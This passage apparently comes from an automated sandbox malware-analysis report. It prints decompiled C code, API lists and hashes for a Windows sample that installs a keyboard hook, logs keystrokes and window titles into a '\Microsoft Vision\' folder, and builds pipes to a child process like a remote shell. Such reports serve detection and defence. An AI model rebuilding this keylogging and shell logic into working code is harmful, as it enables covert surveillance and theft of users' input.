				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v228);
				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
				_t40 =  *0x446690; // 0x0
				lstrcatW(_t40 + 0x10,  &_v176);
				_t64 =  *0x446690; // 0x0
				_t11 = _t64 + 0x10; // 0x10
				E0043312C(_t64 + 0xc, _t71, _t11);
				_t45 =  *0x446690; // 0x0
				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
				_t66 =  *0x446690; // 0x0
				 *(_t66 + 4) = _t46;
				CloseHandle(_t46);
				_v228.wYear = 0;
				_t68 = E0043FC79("c:\\windows\\system32\\user32.dll",  &_v228);
				_t49 = E0043E970(_t68, 0, _t90);
				_t91 = _t49;
				if(_t49 == 0) {
					_t50 =  *0x44668c; // 0x0
				} else {
					_push(_t68);
					_t50 = E0043E907(_t49, "SetWindowsHookExA", _t91);
					 *0x44668c = _t50;
				}
				 *_t50(0xd, E00437645, _t60, 0);
				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
					TranslateMessage( &_v204);
					DispatchMessageA( &_v204);
				}
				return 0;
			}


























                                      0x004374b4
                                      0x004374b4
                                      0x004374c5
                                      0x004374cb
                                      0x004374d5
                                      0x004374df
                                      0x004374e5
                                      0x004374e6
                                      0x004374e7
                                      0x004374ec
                                      0x004374f1
                                      0x00437503
                                      0x00437508
                                      0x00437519
                                      0x0043751f
                                      0x00437533
                                      0x0043753a
                                      0x0043756e
                                      0x0043757c
                                      0x00437585
                                      0x00437587
                                      0x0043758d
                                      0x00437594
                                      0x00437599
                                      0x004375b1
                                      0x004375b7
                                      0x004375be
                                      0x004375c1
                                      0x004375cb
                                      0x004375db
                                      0x004375dd
                                      0x004375e2
                                      0x004375e4
                                      0x004375fb
                                      0x004375e6
                                      0x004375e6
                                      0x004375ee
                                      0x004375f4
                                      0x004375f4
                                      0x00437609
                                      0x0043762c
                                      0x0043761b
                                      0x00437626
                                      0x00437626
                                      0x00437642

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004374C5
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00437519
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00437533
                                      • GetLocalTime.KERNEL32(?), ref: 0043753A
                                      • wsprintfW.USER32 ref: 0043756E
                                      • lstrcatW.KERNEL32(-00000010,?), ref: 00437585
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 004375B1
                                      • CloseHandle.KERNEL32(00000000), ref: 004375C1
                                        • Part of subcall function 0043FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
                                        • Part of subcall function 0043FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00432B6F), ref: 0043FCB1
                                        • Part of subcall function 0043FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
                                        • Part of subcall function 0043FC79: CloseHandle.KERNEL32(00000000), ref: 0043FCC9
                                        • Part of subcall function 0043E970: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,757C68BC,00000000,?,?,?,?,004375E2), ref: 0043E99C
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00437634
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      • TranslateMessage.USER32(?), ref: 0043761B
                                      • DispatchMessageA.USER32(?), ref: 00437626
                                      Strings
                                      • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00437568
                                      • c:\windows\system32\user32.dll, xrefs: 004375CF
                                      • SetWindowsHookExA, xrefs: 004375E7
                                      • \Microsoft Vision\, xrefs: 0043752D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                      • API String ID: 1431388325-3884914687
                                      • Opcode ID: 41c601a6e80cbacfb71d2cbd338460a8f253fac00c0851fdb6ac120f768e8396
                                      • Instruction ID: c55a43e6e8974fea1b9ad4a5ec4fabac616600c770b5ddb45c63df93b48110ec
                                      • Opcode Fuzzy Hash: 41c601a6e80cbacfb71d2cbd338460a8f253fac00c0851fdb6ac120f768e8396
                                      • Instruction Fuzzy Hash: AD41A1B5504200ABD7109FA9DC09E2B77ECFB8E704F01092EFA49D3191D6B8E904C76A
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043CD2C, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 135pipethreadUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043CD2C(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E0043CCBA(0x446550);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E0043CEBD( &_v12);
					E0043CEBD( &_v8);
					E0043CEBD( &_v16);
					E0043CEBD( &_v20);
					E0043CEBD( &_v24);
					E0043CCBA(0x446550);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x446558, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x44655c, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E0043CEBD( &_v12);
								E0043CEBD( &_v20);
								E0043345A(_t95,  &_a4);
								if(E0043CACA(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E0043CEBD( &_v8);
									E0043CEBD( &_v24);
									E0043CEBD( &_v16);
									 *0x446560 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E0043CB63, 0x446550, 0, 0x446568);
									 *0x446564 = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E00435A2D(_a4);
				return _t94;
			}
















                                      0x0043cd3a
                                      0x0043cd3f
                                      0x0043cd46
                                      0x0043cd4c
                                      0x0043cd50
                                      0x0043cd51
                                      0x0043cd55
                                      0x0043cd59
                                      0x0043cd63
                                      0x0043cd6e
                                      0x0043cd7a
                                      0x0043ce78
                                      0x0043ce7b
                                      0x0043ce83
                                      0x0043ce8b
                                      0x0043ce93
                                      0x0043ce9b
                                      0x0043cea5
                                      0x0043ceaa
                                      0x0043cd80
                                      0x0043cd8f
                                      0x0043cda2
                                      0x00000000
                                      0x0043cdc4
                                      0x0043cdcf
                                      0x0043cddc
                                      0x00000000
                                      0x0043cde2
                                      0x0043cded
                                      0x0043cdf6
                                      0x0043cdf8
                                      0x0043cdfa
                                      0x00000000
                                      0x0043cdfc
                                      0x0043cdff
                                      0x0043ce07
                                      0x0043ce1c
                                      0x0043ce28
                                      0x00000000
                                      0x0043ce2a
                                      0x0043ce2d
                                      0x0043ce35
                                      0x0043ce3d
                                      0x0043ce64
                                      0x0043ce69
                                      0x0043ce6f
                                      0x0043ce76
                                      0x00000000
                                      0x00000000
                                      0x0043ce76
                                      0x0043ce28
                                      0x0043cdfa
                                      0x0043cddc
                                      0x0043cda2
                                      0x0043ceaf
                                      0x0043ceba

                                      APIs
                                        • Part of subcall function 0043CCBA: GetCurrentThreadId.KERNEL32(?,00000000,0043292E,00000000,exit,00000000,start), ref: 0043CCC6
                                        • Part of subcall function 0043CCBA: SetEvent.KERNEL32(00000000), ref: 0043CCDA
                                        • Part of subcall function 0043CCBA: WaitForSingleObject.KERNEL32(00446564,00001388), ref: 0043CCE7
                                        • Part of subcall function 0043CCBA: TerminateThread.KERNEL32(00446564,000000FE), ref: 0043CCF8
                                      • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0043CD72
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0043CD8F
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0043CD95
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0043CD9E
                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0043CDB6
                                      • GetCurrentProcess.KERNEL32(00446558,00000000,00000000,00000002,?,00000000), ref: 0043CDCF
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0043CDD5
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0043CDD8
                                      • GetCurrentProcess.KERNEL32(0044655C,00000000,00000000,00000002,?,00000000), ref: 0043CDED
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0043CDF3
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043CE49
                                      • CreateThread.KERNEL32(00000000,00000000,0043CB63,00446550,00000000,00446568), ref: 0043CE69
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0043CDF6
                                        • Part of subcall function 0043CEBD: CloseHandle.KERNEL32(00446560), ref: 0043CEC7
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043CACA: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0043CB1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                      • String ID: PeD$PeD
                                      • API String ID: 337272696-1629772315
                                      • Opcode ID: 2d65bd5ecfb29ad49ead6c41371b354e3091f7554898dc26b4b4dfad31843db8
                                      • Instruction ID: 16956773d88fabf2b0ede425fe3a8f8a30fd143fbb6778f3c9f5114ddcab6b82
                                      • Opcode Fuzzy Hash: 2d65bd5ecfb29ad49ead6c41371b354e3091f7554898dc26b4b4dfad31843db8
                                      • Instruction Fuzzy Hash: CA413E71940209BAEB14EBE1DC86FEFB778AF19705F10542BF101B20D5DBB89A04CB68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00437AEB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00437AEB(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E00431052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E0043312C( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E00433412( &_v12,  &_v536);
					E00433162(E00433297( &_v8, _t94, _t106, "{"), _t106, _t73);
					E00433297(_t74, _t94, _t106, "}");
					E00435A2D(_v12);
					_v12 = 0;
				}
				_t37 =  *0x446690; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x446690; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x446690; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E00433075( &_v8, E00433412( &_v12, _t40 + 0x210));
					E00435A2D(_v12);
					_t40 =  *0x446690; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x446690; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x446690; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x446690; // 0x0
					_t59 = E0043308E( &_v8);
					_t61 =  *0x446690; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x446690; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x446690; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x446690; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x446690; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x446690; // 0x0
				CloseHandle( *(_t50 + 4));
				return E00435A2D(_v8);
			}
































                                      0x00437aeb
                                      0x00437afe
                                      0x00437b09
                                      0x00437b11
                                      0x00437b27
                                      0x00437b2d
                                      0x00437b2f
                                      0x00437b7a
                                      0x00437b31
                                      0x00437b3b
                                      0x00437b54
                                      0x00437b60
                                      0x00437b68
                                      0x00437b6d
                                      0x00437b6d
                                      0x00437b7f
                                      0x00437b90
                                      0x00437b94
                                      0x00437b99
                                      0x00437bd4
                                      0x00437bd7
                                      0x00437bd7
                                      0x00437bdd
                                      0x00437be3
                                      0x00437be8
                                      0x00437b9b
                                      0x00437bad
                                      0x00437bb7
                                      0x00437bbc
                                      0x00437bc1
                                      0x00437bc6
                                      0x00000000
                                      0x00437bc8
                                      0x00437bc8
                                      0x00437bc8
                                      0x00437bc6
                                      0x00437bfe
                                      0x00437c04
                                      0x00437c16
                                      0x00437c19
                                      0x00437c1d
                                      0x00437c20
                                      0x00437c27
                                      0x00437c2a
                                      0x00437c33
                                      0x00437c35
                                      0x00437c46
                                      0x00437c4e
                                      0x00437c57
                                      0x00437c59
                                      0x00437c5e
                                      0x00437c6a
                                      0x00437c6d
                                      0x00437c76
                                      0x00437c78
                                      0x00437c78
                                      0x00437c7e
                                      0x00437c81
                                      0x00437c88
                                      0x00437c8d
                                      0x00437c96
                                      0x00437c98
                                      0x00437ca0
                                      0x00437cb2

                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00437B14
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00437B27
                                      • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00437B90
                                      • lstrcpyW.KERNEL32(-00000210,?), ref: 00437BDD
                                      • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00437BFE
                                      • lstrlenW.KERNEL32(004429A0,00000008,00000000,?,?), ref: 00437C27
                                      • WriteFile.KERNEL32(?,004429A0,00000000,?,?), ref: 00437C33
                                      • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00437C57
                                      • lstrlenW.KERNEL32(004429A0,-00000008,00000000,?,?), ref: 00437C6A
                                      • WriteFile.KERNEL32(?,004429A0,00000000,?,?), ref: 00437C76
                                      • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00437C88
                                      • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00437C96
                                      • CloseHandle.KERNEL32(?), ref: 00437CA0
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                      • String ID: {Unknown}
                                      • API String ID: 2314120260-4054869793
                                      • Opcode ID: 89567b6256b8d008784d5c57ab9fc93ca064703fc76aece5004779e9dc672109
                                      • Instruction ID: 9da2dd976ae0851069b8f0034fe27f83b6899eab9a0939bc721ea45e4388457e
                                      • Opcode Fuzzy Hash: 89567b6256b8d008784d5c57ab9fc93ca064703fc76aece5004779e9dc672109
                                      • Instruction Fuzzy Hash: 0451A175A00208BFD700EF55DD85FAA77B8FF0A308F0640A9F909A7261C774AE04CB59
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      Function 00CC9B3B, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00CC9B7F
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC9734
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC9746
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC9758
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC976A
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC977C
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC978E
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97A0
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97B2
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97C4
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97D6
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97E8
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97FA
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC980C
                                      • _free.LIBCMT ref: 00CC9B74
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC9B96
                                      • _free.LIBCMT ref: 00CC9BAB
                                      • _free.LIBCMT ref: 00CC9BB6
                                      • _free.LIBCMT ref: 00CC9BD8
                                      • _free.LIBCMT ref: 00CC9BEB
                                      • _free.LIBCMT ref: 00CC9BF9
                                      • _free.LIBCMT ref: 00CC9C04
                                      • _free.LIBCMT ref: 00CC9C3C
                                      • _free.LIBCMT ref: 00CC9C43
                                      • _free.LIBCMT ref: 00CC9C60
                                      • _free.LIBCMT ref: 00CC9C78
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 9cedb4e92ac7fae3bf2c465ebbe9231e94b1b17b5b3d0bda23e026fd4f63f6bb
                                      • Instruction ID: 23ce9ffa6e7acb406f9e3bd4ad9399cb462240b0501d85e6ef94fb82e1fe90b9
                                      • Opcode Fuzzy Hash: 9cedb4e92ac7fae3bf2c465ebbe9231e94b1b17b5b3d0bda23e026fd4f63f6bb
                                      • Instruction Fuzzy Hash: F0315972600705AFEB30AA39DD49F56B3E8FF48311F10456DE069D7291DF35AE809B10
                                      Uniqueness

                                      Uniqueness Score: 0.25%

                                      Function 0043B90E, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043B90E(struct _QUERY_SERVICE_CONFIG* _a4) {
				int _v8;
				void* __ecx;
				void* _t10;
				void* _t26;
				struct _QUERY_SERVICE_CONFIG* _t34;
				void* _t37;

				_v8 = 0;
				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E00435A87(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E004310C1(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}









                                      0x0043b91e
                                      0x0043b921
                                      0x0043b927
                                      0x0043b92b
                                      0x0043b940
                                      0x0043b944
                                      0x0043b95e
                                      0x0043b973
                                      0x0043b97c
                                      0x0043b989
                                      0x0043b9a5
                                      0x0043b9a8
                                      0x0043b9ad
                                      0x0043b9b3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043b98b
                                      0x0043b98b
                                      0x0043b992
                                      0x0043b995
                                      0x00000000
                                      0x0043b995
                                      0x0043b946
                                      0x0043b947
                                      0x0043b997
                                      0x0043b997
                                      0x0043b997
                                      0x0043b9b5
                                      0x0043b9b9

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0043B921
                                      • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0043B93A
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B947
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0043B956
                                      • GetLastError.KERNEL32 ref: 0043B960
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0043B981
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B992
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B995
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B9A5
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B9A8
                                        • Part of subcall function 004310C1: GetProcessHeap.KERNEL32(00000000,00000000,00433341,00000000,00000000,?,?,?,00000000), ref: 004310C7
                                        • Part of subcall function 004310C1: HeapFree.KERNEL32(00000000,?,?), ref: 004310CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                      • String ID: ServicesActive
                                      • API String ID: 1929760286-3071072050
                                      • Opcode ID: 45616e4342232f194c85f53f3905afa11dc3d0d2de4ea721b5f0b82aad506150
                                      • Instruction ID: 787cf525705c3054e006756fb53f483166ff966a1435b526419edb296f28109d
                                      • Opcode Fuzzy Hash: 45616e4342232f194c85f53f3905afa11dc3d0d2de4ea721b5f0b82aad506150
                                      • Instruction Fuzzy Hash: 4A1190B5900514BBCB109B62DD89F9F7EACEF8A754B105026F701D2221DBB89E00CBE8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043C253, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 259UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0043C253(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v48;
				char _v52;
				char _v56;
				signed int _v60;
				char _v64;
				char _v68;
				intOrPtr _v76;
				int _t75;
				int _t76;
				int _t79;
				int _t80;
				void* _t82;
				void* _t83;
				int _t84;
				int _t86;
				int _t87;
				int _t93;
				void* _t94;
				int _t132;
				void* _t142;
				char* _t143;
				signed int _t154;
				char* _t184;
				intOrPtr _t193;
				char* _t196;
				void* _t199;
				struct _CRITICAL_SECTION* _t202;
				signed int _t211;
				signed int _t213;
				void* _t215;

				_t199 = __edx;
				_t156 = __ecx;
				_t215 = (_t213 & 0xfffffff8) - 0x34;
				_t202 = __ecx;
				_t154 = 0;
				_v36 = 0;
				_v32 = 0;
				_v56 = 0;
				EnterCriticalSection(__ecx);
				if(E0043DBF3(_t156) == 1) {
					_t156 =  &_v56;
					E0043D5DB( &_v56);
				}
				_t205 = _t202 + 0x38;
				_t75 = PathFileExistsW( *(_t202 + 0x38));
				_t217 = _t75;
				if(_t75 != 0) {
					L11:
					_t206 = _t202 + 0x3c;
					_t76 = PathFileExistsW( *(_t202 + 0x3c));
					__eflags = _t76;
					if(_t76 != 0) {
						L17:
						E0043C033(_t202, _t199);
						E0043C01A(_t202);
						_t159 = _t202;
